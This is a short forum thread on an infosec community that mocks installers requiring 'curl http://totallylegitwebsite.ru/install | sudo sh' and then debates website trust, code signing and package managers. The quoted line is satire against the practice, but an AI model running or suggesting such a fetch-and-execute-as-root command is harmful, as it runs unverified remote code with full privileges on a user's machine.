Skip Navigation

196 @lemmy.blahaj.zone

Sophocles @infosec.pub

5d ago

Appimage rule

You're viewing a single thread.

31 comments

You must run curl http://totallylegitwebsite.ru/install | sudo sh, it's the only way to install our product. Don't even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.
- I hate this model, but if you trust the website, piping to shell is exactly as safe as downloading and executing a installer. (Yeah yeah, https, function executed on last line, etc)
  
  I don't want to trust a website, which is susceptible to typos and lookalikes (see e.g. putty.org) and relies on countless other services that can inject malware.
  Code signing was creates for this reason: ensure that the program is authentic and unaltered. Package managers do this perfectly.
  
  100%. I'm just saying that on Windows an Mac, the inferior “download an installer” model is still prevalent, and that |sh is as safe as that.
- Using brew in Linux is a bit better

31 comments